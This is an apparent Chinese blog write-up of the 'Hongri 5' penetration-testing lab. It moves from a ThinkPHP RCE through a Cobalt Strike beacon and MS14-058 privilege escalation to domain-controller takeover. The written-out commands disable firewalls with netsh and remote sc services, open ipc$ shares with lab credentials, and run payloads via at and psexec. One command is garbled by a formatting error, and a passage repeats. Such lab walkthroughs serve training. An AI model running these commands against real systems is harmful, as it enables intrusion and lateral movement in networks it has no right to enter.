红日5渗透

红日5渗透

靶场搭建

靶场下载:漏洞详情 (qiyuanxuetang.net)

这次只有两台机器

win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

Win7双网卡模拟内外网

和之前一样设置一个外网nat模式,一个仅主机模式

进去后会提示密码过期

改为1qaz@wsx

image-20240329124811000

2008 ip:192.168.26.138

image-20240329124838933

win7 ip: 外网192.168.131.150

​ 内网192.168.26.136

到c盘打开phpstudy

image-20240329125011733

image-20240329125054502

渗透

信息收集

端口探测

 nmap -p- -sC -sV 192.168.131.150

image-20240329125559901

可以看到80端口 和3306mysql端口开放

image-20240329125633924

映入眼帘的是thinkphp

直接上工具

漏洞利用

image-20240329125733960

image-20240329125941711

image-20240329130306630

找到了rce的漏洞

一键getshell

image-20240329130819770

然后用webshell管理工具连接

image-20240329131107456

上线CS

image-20240329131310270

cs生成的木马

通过蚁剑上传

image-20240329131344389

image-20240329131404666

运行hongri.exe

上线

image-20240329131421523

image-20240329131508650

提权

image-20240329131553535

通过windows ms14-058漏洞提权到system

image-20240329131718511

查看网络信息

image-20240329131800929

image-20240329131811170

探测到是双网卡

应该是内网

抓取密码

image-20240329132039908

image-20240329132056648

内网信息收集

通过ping来找域控的ip

ping sun.com

image-20240329132221199

得到2008dc ip;192.168.26.138

因为dc是内网环境不出网,我们无法直接连接到cs

但可以用win7作为代理 通过win7去连接dc

这时候要关闭win7防火墙

我们已经system权限所以直接可以关

netsh advfirewall set allprofiles state off

image-20240329132544583

image-20240329132911073

在provideing中找到listener

已经获得了域管理员的用户名密码,那么我们直接尝试使用psexec登录域控

不行

一直失败

估计2008机子上有防火墙

可以尝试关闭他的防火墙

在Windows 7上执行如下,让其与Windows 2008建立ipc$连接:

net use \\192.168.26.138\ipc$ "dc123.com" /user:"administrator"

image-20240329141811645

然后创建服务来远程关闭Windows 2008的防火墙:

sc \\192.168.26.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"    # 创建服务
sc \\192.168.26.138 start unablefirewall    # 立即启动服务

image-20240329142012074

image-20240329142022248

创建服务成功

image-20240329142051508

启动服务失败。。

但是我去本机看了一下是已经成功关闭防火墙了

估计是我执行两次会报错

再起一个中转监听 前面那个忽略掉

image-20240329142906202

image-20240329143040096

image-20240329143901251

上传木马到c:/

使用IPCKaTeX parse error: Undefined control sequence: \ipc at position 37: …192.168.138.138\̲i̲p̲c̲ “!qazwin7” /user:administrator
shell net use \\192.168.26.138\ipc$ "dc123.com" /user:administrator

image-20240329144052775

shell copy c:\内网.exe \192.168.26.138\c$

image-20240329144244304

中文名找不到 又改成123.exe

查看时间,通过计划任务执行木马
shell net time \\192.168.26.138

image-20240329144442744

shell at \\192.168.26.138 14:46:00 c:\123.exe

image-20240329144539106

image-20240329144553973

但一直没反应

很奇怪

换个方式试试

上传psexec

image-20240329164115424

shell c:\psexec64.exe -accepteula \\192.168.26.138 -u sun\administrator -p dc123.com -d -c c:\123.exe

image-20240329164932830

横向移动

想复杂了

后面我 port scan

image-20240329165823962

直接扫除了dc机445端口开着

这就和我之前打的红日2类似

可以直接利用smb横向了 因为已经都有域控密码了

image-20240329165912853

image-20240329165923665

成功上线域控 并且是system权限

image-20240329165934280

后面我 port scan

[外链图片转存中…(img-PFYFeTb6-1712578519583)]

直接扫除了dc机445端口开着

这就和我之前打的红日2类似

可以直接利用smb横向了 因为已经都有域控密码了

[外链图片转存中…(img-UlMiAy5N-1712578519583)]

[外链图片转存中…(img-pblTc7nB-1712578519583)]

成功上线域控 并且是system权限

[外链图片转存中…(img-tmh1FXLM-1712578519583)]

image-20240329170008095

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值